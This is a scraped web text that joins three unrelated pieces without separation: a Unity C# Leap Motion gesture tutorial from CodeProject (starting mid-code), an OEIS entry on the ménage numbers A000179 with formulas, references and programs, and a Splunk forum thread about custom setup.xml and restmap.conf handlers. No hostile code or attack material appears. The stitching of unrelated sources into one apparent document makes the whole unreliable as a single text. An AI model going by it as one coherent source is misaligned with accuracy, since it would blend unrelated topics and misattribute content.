Text lblLeftHandPosition; public Text lblLeftHandRotation; public Text lblRightHandPosition; public Text lblRightHandRotation; // Use this for initialization void Start() { hc.GetLeapController().EnableGesture(Gesture.GestureType.TYPECIRCLE); hc.GetLeapController().EnableGesture(Gesture.GestureType.TYPESWIPE); hc.GetLeapController().EnableGesture(Gesture.GestureType.TYPE_SCREEN_TAP); } private GameObject cube = null; // Update is called once per frame Frame currentFrame; Frame lastFrame = null; Frame thisFrame = null; long difference = 0; void Update() { this.currentFrame = hc.GetFrame(); GestureList gestures = this.currentFrame.Gestures(); foreach (Gesture g in gestures) { Debug.Log(g.Type); if (g.Type == Gesture.GestureType.TYPECIRCLE) { // create the cube ... if (this.cube == null) { this.cube = GameObject.Instantiate(this.cubePrefab, this.cubePrefab.transform.position, this.cubePrefab.transform.rotation) as GameObject; } } if (g.Type == Gesture.GestureType.TYPESWIPE) { if (this.cube != null) { Destroy(this.cube); this.cube = null; } } } foreach (var h in hc.GetFrame().Hands) { if (h.IsRight) { this.lblRightHandPosition.text = string.Format("Right Hand Position: {0}", h.PalmPosition.ToUnity()); this.lblRightHandRotation.text = string.Format("Right Hand Rotation: <{0},{1},{2}>", h.Direction.Pitch, h.Direction.Yaw, h.Direction.Roll); if (this.cube != null) this.cube.transform.rotation = Quaternion.EulerRotation(h.Direction.Pitch, h.Direction.Yaw, h.Direction.Roll); foreach (var f in h.Fingers) { if (f.Type() == Finger.FingerType.TYPE_INDEX) { // this code converts the tip position from leap motion to unity world position Leap.Vector position = f.TipPosition; Vector3 unityPosition = position.ToUnityScaled(false); Vector3 worldPosition = hc.transform.TransformPoint(unityPosition); //string msg = string.Format("Finger ID:{0} Finger Type: {1} Tip Position: {2}", f.Id, f.Type(), worldPosition); //Debug.Log(msg); } } } if (h.IsLeft) { this.lblLeftHandPosition.text = string.Format("Left Hand Position: {0}", h.PalmPosition.ToUnity()); this.lblLeftHandRotation.text = string.Format("Left Hand Rotation: <{0},{1},{2}>", h.Direction.Pitch, h.Direction.Yaw, h.Direction.Roll); if (this.cube != null) this.cube.transform.rotation = Quaternion.EulerRotation(h.Direction.Pitch, h.Direction.Yaw, h.Direction.Roll); } } } } There are several things that are happening in this code. I will point out the most important sections and let you work around the rest yourself. For instance, I am not going to cover the UI code and ect… You can look at the article series for a detailed explanation of how to setup and work with the new UI framework. We have a public HandController object defined as hc. This is a reference to the HandController in the scene so we can access the functions and properties as needed. The first thing we would need to do is register hand gestures with the HandController object. This is done in the Start() function. There are some predefined gestures already defined by default, so we will be using some of them. In this case, we have registered the CIRCLE, SWIPE, and SCREEN_TAP gesture types. We have also defined two variables of type GameObject named cubePrefab, and cube. The variable cubePrefab is a reference to a prefab that was created to represent our cube with the appropriate materials and components associated with it. Let’s take a look at the Update() function. This is the core of where everything happens and it might be a little confusing at first, but you will get a hang of it in no time. What we are doing here, is that we are looking for a hand gesture of TYPECIRCLE. This will instantiate the prefab we have defined and reference in the variable called cubePrefab. So the first thing we are doing in the function is grabbing the current frame from the HandController object. A Frame object contains all of the information pertaining to the hand motion at that given instance. The next step is to get a list of all the gestures that was detected by the sensor and store it in a list. Next we are going to loop through each gesture and detect the type. If we detect a CIRCLE gesture we will check to see if we have already instantiated our cube prefab, and if not we will go ahead and instantiate it. The next gesture type is of SWIPE, and this will destroy our instantiated prefab. The next loop basically goes through the hands detected in the current frame, and detects if it is the left hand or the right hand, and based on which hand it is it perform specific operations. In this case, we just get the position and rotation of the hands, and also rotate our instantiated cube based on the rotation of the right or left hand. Nothing fancy! You can see the result in the following video: demo Virtual reality has always been one of those topics in the industry that gets a lot of exposure at a point in time and then everything cools down. This time around, things are a bit different. The hardware and software ecosystem that enables Virtual Reality possible is becoming more and more democratized. The cost of the hardware, even though not cheap, but economical for those who are really eager to get their hands dirty, is at a point that most developers can afford. This enables the development community to provide better VR experiences and entertainment. The idea of integrating hand motion and gestures with VR applications is a must. I have decided to look into Leap Motion as it is a promising input sensor for non-touch user interaction with the computer. The next step would be to integrate Leap Motion with Oculus Rift. This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) I have follow Leap Motion Integration tutorial step by step.I have attach the script GrabMyCube to the cube and run the project.when play ,it immediately pause the game.I cant to able understand why it pause. I am using unity 5.1.2f personal edition.Is it version problem ? General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
https://www.codeproject.com/Articles/1007186/UNITY-D-Leap-Motion-Integration
CC-MAIN-2018-30
refinedweb
2,890
55.24
Hi Leslie, Have you run any basic tests on your code? If it basically works, feel free to commit what you have to cvs. We can always change things afterwards... On Tue, Jun 28, 2005 at 04:04:16PM +0200, address@hidden wrote: > > You also need to free *sector and *range, and set them to NULL... > Fixed. I hope I never forget to free things again when throwing exceptions. Oops, you shouldn't free *sector. Only *range. > > Come to think of it, why is there any rounding here at all? > > > > (That is, why is there a 0.5 in there?) > I didn't put it in, so I don't know for sure -- but I also pondered about it > and came to the conclusion that it is a ward against division by zero. You should always be suspicious of a piece of code you don't understand! IIRC, this was to make formatting and inputting consistent. I now think this code is bogus, so we should just kill it. > > Do we need the braces? > I'm afraid yes. Why? > > Also, this still spills of 80 characters. Perhaps define cyl_size at > > the top? > I suggest > > PedSector cyl_size = dev->bios_geom.heads > * dev->bios_geom.sectors; > > instead. This way we save the memory management when we do not need > this variable. Who cares about 8 bytes of memory? Premature optimization is the root of all evil! Cleanliness and readability are more important, unless you are talking about megabytes or seconds. (This is doubly true for Parted, because users expect high reliability and don't care much about speed.) Besides, it makes no difference. The C compiler won't allocate any extra stack space for cyl_size: it will just compute it as needed, and/or stick it in a register. > + { > + long long unit_size = ped_unit_get_size (dev, unit); > + PedSector unit_sectors = ped_div_round_up (unit_size, > PED_SECTOR_SIZE); > + > + *sector = ped_div_round_up (num * unit_size, PED_SECTOR_SIZE); > + *range = geometry_from_centre_radius (dev, *sector, unit_sectors); > + > + if (!ped_geometry_test_sector_inside (*range, *sector)) > + { > + ped_free (sector); > + ped_free (*range); > + > + ped_exception_throw ( > + PED_EXCEPTION_ERROR, > + PED_EXCEPTION_CANCEL, > + _("Sector outside of device")); > + } This is still broken. I would write it something like this: > + if (!ped_geometry_test_sector_inside (*range, *sector)) { > + ped_exception_throw ( > + PED_EXCEPTION_ERROR, PED_EXCEPTION_CANCEL, > + _("The location %s is outside of the device %s."), > + str, dev->path); > + *sector = 0; > + ped_free (*range); > + *range = NULL; > + return 0; > + } > +/** > + * Returns the byte size of a given unit. > + */ > +long long > +ped_unit_get_size (PedDevice* dev, PedUnit unit) > +{ > + switch (unit) > + { I notice you have started putting opening braces on their own line. This is different from the rest of Parted. (We only put the first brace of a function on a new line... see the Linux coding standard for rationale.) It doesn't matter that much. > + case PED_UNIT_SECTOR: return PED_SECTOR_SIZE; > + case PED_UNIT_BYTE: return 1; > + case PED_UNIT_KILOBYTE: return PED_KILOBYTE_SIZE; > + case PED_UNIT_MEGABYTE: return PED_MEGABYTE_SIZE; > + case PED_UNIT_GIGABYTE: return PED_GIGABYTE_SIZE; > + case PED_UNIT_TERABYTE: return PED_TERABYTE_SIZE; > + > + case PED_UNIT_CYLINDER: > + { > + PedSector cyl_size = dev->bios_geom.heads > + * dev->bios_geom.sectors; > + return ( cyl_size * PED_SECTOR_SIZE ); > + } I think it's better to put the cyl_size definition at the top of the function. Why the brackets around the return value? > + case PED_UNIT_PERCENT: > + return ( get_sectors_per_cent (dev) * PED_SECTOR_SIZE ); Why the brackets? > @@ -918,8 +905,8 @@ do_print (PedDevice** dev) > return status; > } > > - start = ped_unit_format (0, *dev); > - end = ped_unit_format ((*dev)->length - 1, *dev); > + start = ped_unit_format (*dev,0 ); Bad formatting here ^ > @@ -1197,7 +1184,7 @@ do_resize (PedDevice** dev) > PedFileSystem* fs; > PedConstraint* constraint; > PedSector start, end; > - int is_start_exact, is_end_exact; > + PedGeometry *range_start, *range_end; > PedGeometry new_geom; Inconsistent formatting. Cheers, Andrew
http://lists.gnu.org/archive/html/bug-parted/2005-06/msg00238.html
CC-MAIN-2014-42
refinedweb
555
58.18
CodePlexProject Hosting for Open Source Software Hi there. I've been wrestling with this for a couple days now and I think maybe I'm going about this the wrong way. I'll give you an example of the end result I'm trying to achieve: Say I have a Part I've created called BallPart and it's being used by the Ball content type. One of the characteristics of this ball is its color: blue, red, green. Now I want widgets I can place that will filter the Ball content types by color--BlueBallWidget, RedBallWidget, GreenBallWidget. That's the desired end result. I've created a Module that creates the BallPart and the Ball content type. This I've gotten to work. It's been trying to wire up the collection of Balls to a widget that's got me running in circles. Migration.cs ContentDefinitionManager.AlterPartDefinition("BlueBallsWidgetPart", cfg => cfg .Attachable() ); ContentDefinitionManager.AlterTypeDefinition("BlueBallsWidget",cfg => cfg .WithPart("BlueBallsWidgetPart") .WithPart("CommonPart") .WithPart("WidgetPart") ); ContentDefinitionManager.AlterPartDefinition("RedBallsWidgetPart", cfg => cfg .Attachable() ); ContentDefinitionManager.AlterTypeDefinition("RedBallsWidget", cfg => cfg .WithPart("RedBallsWidgetPart") .WithPart("CommonPart") .WithPart("WidgetPart") ); ContentDefinitionManager.AlterPartDefinition("GreenBallsWidgetPart", cfg => cfg .Attachable() ); ContentDefinitionManager.AlterTypeDefinition("GreenBallsWidget", cfg => cfg .WithPart("GreenBallsWidgetPart") .WithPart("CommonPart") .WithPart("WidgetPart") ); Models\Balls.cs public class BallsPart : ContentPart { public readonly LazyField<IList<BallPart>> _blueBalls = new LazyField<IList<BallPart>>(); public readonly LazyField<IList<BallPart>> _redBalls = new LazyField<IList<BallPart>>(); public readonly LazyField<IList<BallPart>> _greenBalls = new LazyField<IList<BallPart>>(); public BallsPart() { BlueBalls = new List<BallPart>(); RedBalls = new List<BallPart>(); GreenBalls = new List<BallPart>(); } public IList<BallPart> BlueBalls { get { return _blueBalls.Value; } set { _blueBalls.Value = value; } } public IList<BallPart> RedBalls { get { return _redBalls.Value; } set { _redBalls.Value = value; } } public IList<BallPart> GreenBalls { get { return _greenBalls.Value; } set { _greenBalls.Value = value; } } } Handlers\BallsHandler.cs public class BallsPartHandler : ContentHandler { public BallsPartHandler(IContentManager contentManager) { OnInitializing<BallsPart>((ctx, x) => { x.BlueBalls = new List<BallPart>(); x.RedBalls = new List<BallPart>(); x.GreenBalls = new List<BallPart>(); }); OnLoading<BallsPart>((context, balls) => { balls._blueBalls.Loader(list => contentManager .Query<BallPart, BallRecord>() .Where(x => x.Type == BallType.BLUE) .List().ToList()); balls._redBalls.Loader(list => contentManager .Query<BallPart, BallRecord>() .Where(x => x.Type == BallType.RED) .List().ToList()); balls._greenBalls.Loader(list => contentManager .Query<BallPart, BallRecord>() .Where(x => x.Type == BallType.GREEN) .List().ToList()); }); } } Any ideas? First of all I am curious as to why you are creating a BallWidgetPart for each color, instead of a single BallWidgetPart with a Color property? Secondly, you are initializing the list of balls in the BallsPart 3 times: once in the constructor, once in the Initializing method of the handler and once on the OnLoading method. It's not a problem, it just seems a bit wasteful (however minimal it may be). Thirdly, it is confusing to me why you defined the different colored BallWidgetParts using the ContentDefinitionManager, but omitted the BallsPart. Now I have no idea if you want to create a Balls widget or not. Your title is also somewhat confusing. It looks like you want to create multiple widgets based on one content type, and yet you created several content types. Which in itself makes sense, since a widget is in itself a content type in its own right. In summary, it's still not very clear to me what it is you want to do with all of the different parts. However, since you created a BallsPart class, the logical next step would be to write a driver for the BallsPart. Since you didn't create part classes for the colored ball widget parts, you can't write drivers for them. First off, thanks for responding. Sorry for the confusing title. I was trying to avoid craming my entire issue in there so I made briefer than it should have been. Most tutorials/examples I have seen have one piece of data--a record, with one Part, and is displayed with one widget. What I need are three widgets that display different aspects of the same data: a Ball. Your points: 2. Ya it does seem wasteful to me too. However, I used Orchard.Comments as the base for my module since it seemed to do roughly the same thing I wanted to do. Figured if they did it like that... 3. Not really sure why I did it like that. Seemed like a good idea at the time, I'm sure. Like I said, I was trying to use Orchard.Comments as the template for my module and I may have tried to make some square pegs fit in that round hole. So, I have a Part and a Record. I can create content types to my heart's content. I'm trying to figure out a way to feed different sets of that content to different widgets. What would be the best way to go about that? Based on what I found in Orchard.Comments, I believe I can use just one model for the different widgets. It's the interaction of the Parts, Handler, and Driver that I'm struggling with. Based on your comments, here's my revised thinking: I have a BallsPart that I need to include in with each of the widgets in the ContentDefinitionManager. My Model and Handler are rough but ok. And I'm going to need a Driver for each widget. Is that a better approach? Thanks! I see. Ok, so if you need a Driver for each widget, you will have to write a Content Part class for each of them if you want different behavior and shapes for each of them. This class could derive from ContentPart instead of ContentPart<T> if you don't need a record class. So if you have for example 3 widget content types: And if you want a unique driver for each of them, you need a unique content part class for each of them: And of course you can attach the BallsPart part to all three widget content types. I'm still not entirely sure if I understand your requirements completely, but just ask away if anything is unclear. Thanks for the tips. I appreciate it. I'll give it a try this weekend. Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
https://orchard.codeplex.com/discussions/406193
CC-MAIN-2017-17
refinedweb
1,052
58.48
0,5 According to rook theory, J. Riordan considered a(1) to be -1; see A102761. - Vladimir Shevelev, Apr 02 2010 Or, for n>=3, the number of 3 X n Latin rectangles the second row of which is full cycle with a fixed order of its elements, e.g., the cycle (x_2,x_3,...,x_n,x_1) with x_1 < x_2 < ... < x_n. - Vladimir Shevelev, Mar 22 2010 Muir (p. 112) gives essentially this recurrence (although without specifying any initial conditions). Compare A186638. - N. J. A. Sloane, Feb 24 2011 Sequence discovered by Touchard in 1934. - L. Edson Jeffery, Nov 13 2013 Although these are also known as Touchard numbers, the problem was formulated by Lucas in 1891, who gave the recurrence formula shown below. See Cerasoli et al., 1988. - Stanislav Sykora, Mar 14 2014 From Vladimir Shevelev, Jun 25 2015: (Start) According to the ménage problem, 2*n!*a(n) is the number of ways of seating n married couples at 2*n chairs around a circular table, men and women in alternate positions, so that no husband is next to his wife. It is known [Riordan, ch. 7] that a(n) is the number of arrangements of n non-attacking rooks on the positions of the 1's in an n X n (0,1)-matrix A_n with 0's in positions (i,i), i = 1,...,n, (i,i+1), i = 1,...,n-1, and (n,1). This statement could be written as a(n) = per(A_n). For example, A_5 has the form 001*11 1*0011 11001* (1) 11*100 0111*0, where 5 non-attacking rooks are denoted by {1*}. We can indicate a one-to-one correspondence between arrangements of n non-attacking rooks on the 1's of a matrix A_n and arrangements of n married couples around a circular table by the rules of the ménage problem, after the ladies w_1, w_2,..., w_n have taken the chairs numbered 2*n, 2, 4, ..., 2*n-2 (2) respectively. Suppose we consider an arrangement of rooks: (1,j_1), (2,j_2),..., (n,j_n). Then the men m_1, m_2,..., m_n took chairs with numbers 2*j_i - 3 (mod 2*n), (3) where the residues are chosen from the interval[1,2*n]. Indeed {j_i} is a permutation of 1,...,n. So {2*j_i-3}(mod 2*n) is a permutation of odd positive integers <= 2*n-1. Besides, the distance between m_i and w_i cannot be 1. Indeed, the equality |2*(j_i-i)-1| = 1 (mod 2*n) is possible if and only if either j_i=i or j_i=i+1 (mod n) that correspond to positions of 0's in matrix A_n. For example, in the case of positions of {1*} in(1) we have j_1=3, j_2=1, j_3=5, j_4=2, j_5=4. So, by(2) and (3) the chairs 1,2,...,10 are taken by m_4, w_2, m_1, w_3, m_5, w_4, m_3, w_5, m_2, w_1, respectively. (End) The first 20 terms of this sequence were calculated in 1891 by E. Lucas (see [Lucas, p. 495]). - Peter J. C. Moses, Jun 26 2015 W. W. R. Ball and H. S. M. Coxeter, Mathematical Recreations and Essays, 13th Ed. Dover, p. 50. M. Cerasoli, F. Eugeni and M. Protasi, Elementi di Matematica Discreta, Nicola Zanichelli Editore, Bologna 1988, Chapter 3, p. 78. L. Comtet, Advanced Combinatorics, Reidel, 1974, p. 185, mu(n). Kaplansky, Irving and Riordan, John, The probleme des menages, Scripta Math. 12, (1946). 113-124. E. Lucas, Théorie des nombres, Paris, 1891, pp. 491-495. P. A. MacMahon, Combinatory Analysis. Cambridge Univ. Press, London and New York, Vol. 1, 1915 and Vol. 2, 1916; see vol. 1, p 256. T. Muir, A Treatise on the Theory of Determinants. Dover, NY, 1960, Sect. 132, p. 112. - N. J. A. Sloane, Feb 24 2011 J. Riordan, An Introduction to Combinatorial Analysis, Wiley, 1958, p. 197. V. S. Shevelev, Reduced Latin rectangles and square matrices with equal row and column sums, Diskr. Mat. (J. of the Akademy of Sciences of Russia) 4(1992), 91-110. - Vladimir Shevelev, Mar 22 2010 N. J. A. Sloane, A Handbook of Integer Sequences, Academic Press, 1973 (includes this sequence). N. J. A. Sloane and Simon Plouffe, The Encyclopedia of Integer Sequences, Academic Press, 1995 (includes this sequence). H. M. Taylor, A problem on arrangements, Mess. Math., 32 (1902), 60ff. J. Touchard, Permutations discordant with two given permutations, Scripta Math., 19 (1953), 108-119. T. D. Noe, Table of n, a(n) for n = 0..100 M. A. Alekseyev, Weighted de Bruijn Graphs for the Ménage Problem and Its Generalizations, arXiv preprint 1510.07926, 2015. Kenneth P. Bogart and Peter G. Doyle, Nonsexist solution of the ménage problem, Amer. Math. Monthly 93 (1986), no. 7, 514-519. A. de Gennaro, How may latin rectangles are there?, arXiv:0711.0527 [math.CO] (2007), see p. 2. P. Flajolet and R. Sedgewick, Analytic Combinatorics, 2009; see page 372 Nick Hobson, Python program for this sequence Irving Kaplansky, Solution of the "Problème des ménages", Bull. Amer. Math. Soc. 49, (1943). 784-785. Irving Kaplansky, Symbolic solution of certain problems in permutations, Bull. Amer. Math. Soc., 50 (1944), 906-914. S. M. Kerawala, Asymptotic solution of the "Probleme des menages, Bull. Calcutta Math. Soc., 39 (1947), 82-84. [Annotated scanned copy] V. Kotesovec, Non-attacking chess pieces, 6ed, 2013, p. 221. A. R. Kräuter, Über die Permanente gewisser zirkulärer Matrizen... E. Lucas, Théorie des Nombres, Gauthier-Villars, Paris, 1891, Vol. 1, p. 495. Vladimir Shevelev, Peter J. C. Moses, The ménage problem with a known mathematician, arXiv:1101.5321 [math.CO], 2011, 2015. H. M. Taylor, A problem on arrangements, Mess. Math., 32 (1902), 60ff. [Annotated scanned copy] J. Touchard, Théorie des substitutions. Sur un problème de permutations, C. R. Acad. Sci. Paris 198 (1934), 631-633. Eric Weisstein's World of Mathematics, Married Couples Problem Eric Weisstein's World of Mathematics, Rooks Problem M. Wyman and L. Moser, On the problème des ménages, Canad. J. Math., 10 (1958), 468-480. D. Zeilberger, Automatic Enumeration of Generalized Menage Numbers, arXiv preprint arXiv:1401.1089 [math.CO], 2014. a(n) = ((n^2-2*n)*a(n-1) + n*a(n-2) - 4(-1)^n)/(n-2) for n >= 4. a(n) = A059375(n)/(2*n!). a(n) = Sum {0<=k<=n} (-1)^k*(2*n)*binomial(2*n-k, k)*(n-k)!/(2*n-k). - Touchard (1934) G.f.: x+(1-x)/(1+x)*Sum_{n>=0} n!*(x/(1+x)^2)^n. - Vladeta Jovovic, Jun 26 2007 a(2^k+2)==0 (mod 2^k); for k>=2, a(2^k)==2(mod 2^k). - Vladimir Shevelev, Jan 14 2011 a(n) = round( 2*n*exp(-2)*BesselK(n,2) ) for n>0. - Mark van Hoeij, Oct 25 2011 a(n) ~ (n/e)^n * sqrt(2*Pi*n)/e^2. - Charles R Greathouse IV, Jan 21 2016 a(0) = 1; () works. a(1) = 0; nothing works. a(2) = 0; nothing works. a(3) = 1; (201) works. a(4) = 2; (2301), (3012) work. a(5) = 13; (20413), (23401), (24013), (24103), (30412), (30421), (34012), (34021), (34102), (40123), (43012), (43021), (43102) work. A000179 := n -> add ((-1)^k*(2*n)*binomial(2*n-k, k)*(n-k)!/(2*n-k), k=0..n); # for n >= 2 U := proc(n) local k; add( (2*n/(2*n-k))*binomial(2*n-k, k)*(n-k)!*(x-1)^k, k=0..n); end; W := proc(r, s) coeff( U(r), x, s ); end; A000179 := n->W(n, 0); # valid for n >= 2 a[n_] := 2*n*Sum[(-1)^k*Binomial[2*n - k, k]*(n - k)!/(2*n - k), {k, 0, n}]; a[0] = 1; a[1] = 0; Table[a[n], {n, 0, 21}] (* Jean-François Alcover, Dec 05 2012, from 2nd formula *) (PARI) {a(n) = local(A); if( n<3, n==0, A = vector(n); A[3] = 1; for(k=4, n, A[k] = (k * (k - 2) * A[k-1] + k * A[k-2] - 4 * (-1)^k) / (k-2)); A[n])} /* Michael Somos, Jan 22 2008 */ (PARI) a(n)=if(n, round(2*n*exp(-2)*besselk(n, 2)), 1) \\ Charles R Greathouse IV, Nov 03 2014 (Haskell) import Data.List (zipWith5) a000179 n = a000179_list !! n a000179_list = 1 : 0 : 0 : 1 : zipWith5 (\v w x y z -> (x * y + (v + 2) * z - w) `div` v) [2..] (cycle [4, -4]) (drop 4 a067998_list) (drop 3 a000179_list) (drop 2 a000179_list) -- Reinhard Zumkeller, Aug 26 2013 Diagonal of A058087. Also a diagonal of A008305. cf. A059375, A102761, A000186, A094047, A067998, A033999, A258664, A258665, A258666, A258667, A258673, A259212. Sequence in context: A179237 A216316 A102761 * A246383 A189087 A037739 Adjacent sequences: A000176 A000177 A000178 * A000180 A000181 A000182 nonn,nice,easy N. J. A. Sloane More terms from James A. Sellers, May 02 2000 Additional comments from David W. Wilson, Feb 18 2003 approved
http://oeis.org/A000179
CC-MAIN-2016-18
refinedweb
1,474
77.64
Re: Is C99 the final C? (some suggestions) From: Sidney Cadot (sidney_at_jigsaw.nl) Date: 12/02/03 - ] Date: Tue, 02 Dec 2003 22:58:07 +0100 Paul Hsieh wrote: > Sidney Cadot <sidney@jigsaw.nl> wrote: >>I think C99 has come a long way to fix the most obvious problems in >>C89 (and its predecessors). > It has? I can't think of a single feature in C99 that would come as > anything relevant in any code I have ever written or will ever write > in the C with the exception of "restrict" and //-style comments. For programming style, I think loop-scoped variable declarations ae a big win. Then there is variable sized array, and complex numbers... I'd really use all this (and more) quite extensively in day-to-day work. >>[...] I for one would be happy if more compilers would >>fully start to support C99, It will be a good day when I can actually >>start to use many of the new features without having to worry about >>portability too much, as is the current situation. > I don't think that day will ever come. In its totallity C99 is almost > completely worthless in real world environments. Vendors will be > smart to pick up restrict and few of the goodies in C99 and just stop > there. Want to take a bet...? >>* support for a "packed" attribute to structs, guaranteeing that no >> padding occurs. > > Indeed, this is something I use on the x86 all the time. The problem > is that on platforms like UltraSparc or Alpha, this will either > inevitably lead to BUS errors, or extremely slow performing code. Preventing the former is the compiler's job; as for the latter, the alternative is to do struct unpacking/unpacking by hand. Did that, and didn't like it for one bit. And of course it's slow, but I need the semantics. > If instead, the preprocessor were a lot more functional, then you > could simply extract packed offsets from a list of declarations and > literally plug them in as offsets into a char[] and do the slow memcpy > operations yourself. This would violate the division between preprocessor and compiler too much (the preprocessor would have to understand quite a lot of C semantics). >>* upgraded status of enum types (they are currently quite >> interchangeable with ints); deprecation of implicit casts from >> int to enum (perhaps supported by a mandatory compiler warning). > > > I agree. Enums, as far as I can tell, are almost useless from a > compiler assisted code integrity point of view because of the > automatic coercion between ints and enums. Its almost not worth the > bothering to ever using an enum for any reason because of it. Yes. >>* a clear statement concerning the minimal level of active function >> calls invocations that an implementation needs to support. >> Currently, recursive programs will stackfault at a certain point, >> and this situation is not handled satisfactorily in the standard >> (it is not adressed at all, that is), as far as I can tell. > That doesn't seem possible. The amount of "stack" that an > implementation might use for a given function is clearly not easy to > define. Better to just leave this loose. It's not easy to define, that's for sure. But to call into recollection a post from six weeks ago: #include <stdio.h> /* returns n! modulo 2^(number of bits in an unsigned long) */ unsigned long f(unsigned long n) { return (n==0) ? 1 : f(n-1)*n; } int main(void) { unsigned long z; for(z=1;z!=0;z*=2) { printf("%lu %lu\n", z, f(z)); fflush(stdout); } return 0; } ...This is legal C (as per the Standard), but it overflows the stack on any implementation (which is usually a sumptom of UB). Why is there no statement in the standard that even so much as hints at this? >>* a library function that allows the retrieval of the size of a memory >> block previously allocated using "malloc"/"calloc"/"realloc" and >> friends. > > There's a lot more that you can do as well. Such as a tryexpand() > function which works like realloc except that it performs no action > except returning with some sort of error status if the block cannot be > resized without moving its base pointer. Further, one would like to > be able to manage *multiple* heaps, and have a freeall() function -- > it would make the problem of memory leaks much more manageable for > many applications. It would almost make some cases enormously faster. But this is perhaps territory that the Standard should steer clear of, more like something a well-written and dedicated third-party library could provide. >>* a #define'd constant in stdio.h that gives the maximal number of >> characters that a "%p" format specifier can emit. Likewise, for >> other format specifiers such as "%d" and the like. >> >>* a printf format specifier for printing numbers in base-2. > Ah -- the kludge request. I'd rather see this as filling in a gaping hole. > Rather than adding format specifiers one at > a time, why not instead add in a way of being able to plug in > programmer-defined format specifiers? Because that's difficult to get right (unlike a proposed binary output form). > I think people in general would > like to use printf for printing out more than just the base types in a > collection of just a few formats defined at the whims of some 70s UNIX > hackers. Why not be able to print out your data structures, or > relevant parts of them as you see fit? The %x format specifier mechanism is perhaps not a good way to do this, if only because it would only allow something like 15 extra output formats. >>* I think I would like to see a real string-type as a first-class >> citizen in C, implemented as a native type. But this would open >> up too big a can of worms, I am afraid, and a good case can be >> made that this violates the principles of C too much (being a >> low-level language and all). > > The problem is that real string handling requires memory handling. > The other primitive types in C are flat structures that are fixed > width. You either need something like C++'s constructor/destructor > semantics or automatic garbage collection otherwise you're going to > have some trouble with memory leaking. A very simple reference-counting implementation would suffice. But yes, it would not rhyme well with the rest of C. > With the restrictions of the C language, I think you are going to find > it hard to have even a language implemented primitive that takes you > anywhere beyond what I've done with the better string library, for > example (). But even with bstrlib, you need to > explicitely call bdestroy to clean up your bstrings. > > I'd be all for adding bstrlib to the C standard, but I'm not sure its > necessary. Its totally portable and freely downloadable, without much > prospect for compiler implementors to improve upon it with any native > implementations, so it might just not matter. >>* Normative statements on the upper-bound worst-case asymptotic >> behavior of things like qsort() and bsearch() would be nice. > > Yeah, it would be nice to catch up to where the C++ people have gone > some years ago. I don't think it is a silly idea to have some consideration for worst-case performance in the standard, especially for algorithmic functions (of which qsort and bsearch are the most prominent examples). >> O(n*log(n)) for number-of-comparisons would be fine for qsort, >> although I believe that would actually preclude a qsort() >> implementation by means of the quicksort algorithm :-) > Anything that precludes the implementation of an actual quicksort > algorithm is a good thing. Saying Quicksort is O(n*log(n)) most of > the time is like saying Michael Jackson does not molest most of the > children in the US. >>* a "reverse comma" type expression, for example denoted by >> a reverse apastrophe, where the leftmost value is the value >> of the entire expression, but the right-hand side is also >> guaranteed to be executed. > > This seems too esoteric. Why is it any more esoteric than having a comma operator? >>* triple-&& and triple-|| operators: &&& and ||| with semantics >> like the 'and' and 'or' operators in python: >> >> a &&& b ---> if (a) then b else a >> a ||| b ---> if (a) then a else b >> >> (I think this is brilliant, and actually useful sometimes). > > Hmmm ... why not instead have ordinary operator overloading? I'll provide three reasons. 1) because it is something completely different 2) because it is quite unrelated (I don't get the 'instead') 3) because operator overloading is mostly a bad idea, IMHO > While > this is sometimes a useful shorthand, I am sure that different > applications have different list cutesy compactions that would be > worth while instead of the one above. ... I'd like to see them. &&& is a bit silly (it's fully equivalent to "a ? b : 0") but ||| (or ?: in gcc) is actually quite useful. >>* a way to "bitwise invert" a variable without actually >> assigning, complementing "&=", "|=", and friends. > > Is a ~= a really that much of a burden to type? It's more a strain on the brain to me, why there are coupled assignment/operators for neigh all binary operators, but not for this unary one. >>* 'min' and 'max' operators (following gcc: ?< and ?>) > > As I mentioned above, you might as well have operator overloading instead. Now I would ask you: which existing operator would you like to overload for, say, integers, to mean "min" and "max" ? >>* a div and matching mod operator that round to -infinity, >> to complement the current less useful semantics of rounding >> towards zero. > Well ... but this is the very least of the kinds of arithmetic operator > extensions that one would want. A widening multiply operation is > almost *imperative*. It always floors me that other languages are not > picking this up. Nearly every modern microprocessor in existence has > a widening multiply operation -- because the CPU manufacturer *KNOW* > its necessary. And yet its not accessible from any language. ...It already is available in C, given a good-enough compiler. Look at the code gcc spits out when you do: unsigned long a = rand(); unsigned long b = rand(); unsigned long long c = (unsigned long long)a * b; > Probably because most languages have been written on top of C or C++. > And what about a simple carry capturing addition? Many languages exists where this is possible, they are called "assembly". There is no way that you could come up with a well-defined semantics for this. Did you know that a PowerPC processor doesn't have a shift-right where you can capture the carry bit in one instruction? Silly but no less true. >>Personally, I don't think it would be a good idea to have templates >>in C, not even simple ones. This is bound to have quite complicated >>semantics that I would not like to internalize. > Right -- this would just be making C into C++. Why not instead > dramatically improve the functionality of the preprocessor so that the > macro-like cobblings we put together in place of templates are > actually good for something? I've posted elsewhere about this, so I > won't go into details. This would intertwine the preprocessor and the compiler; the preprocessor would have to understand a great deal more about C semantics than in currently does (almost nothing). Best regards, Sidney - ]
http://coding.derkeiler.com/Archive/C_CPP/comp.lang.c/2003-12/0459.html
crawl-002
refinedweb
1,904
62.68
Using the documentation reference from here, I am trying to create a setup screen for my application which uses both the default end-points and some custom endpoints. I'm just getting started, but i have a few questions already. handlerfile = MyApp_python_handler.py admin.init(ConfigApp, admin.CONTEXT_NONE)Are there some type of delimiter which tells the python interpreter that this is not part of the def handleEditfrom above? I'm not really accustomed to the python syntax as I come from the C# world. props.conf Thanks in advance, I can use all the help I can get. klee310 ok, for the first question, handlerfile=...py can be anything... just figured that out. Was having problems earlier because of a typo in the restmap.conf (typed handleaction instead of handleraction) lol. and for the second question, regarding python delimiters, it seems there is no such thing as the ';' semicolon, like in C#. However indentation seems to make all the difference in python. Please correct me if i'm wrong. thanks # Add the transform confEncoding = {} confEncoding["CHARSET"] = "CHARSET=ISO-8859-7" # Write out the conf file self.writeConf("props", "host::GreekSource", confEncoding) thanks for the help LukeMurphey. Exactly what I was looking for. in my setup.xml, i specify the endpoint under the block attribute. For example can I override these values if only one of my input beneath this uses another endpoint (for example the default admin/roles endpoints)?
https://community.splunk.com/t5/Archive/custom-setup-xml-with-restmap-conf/td-p/71612
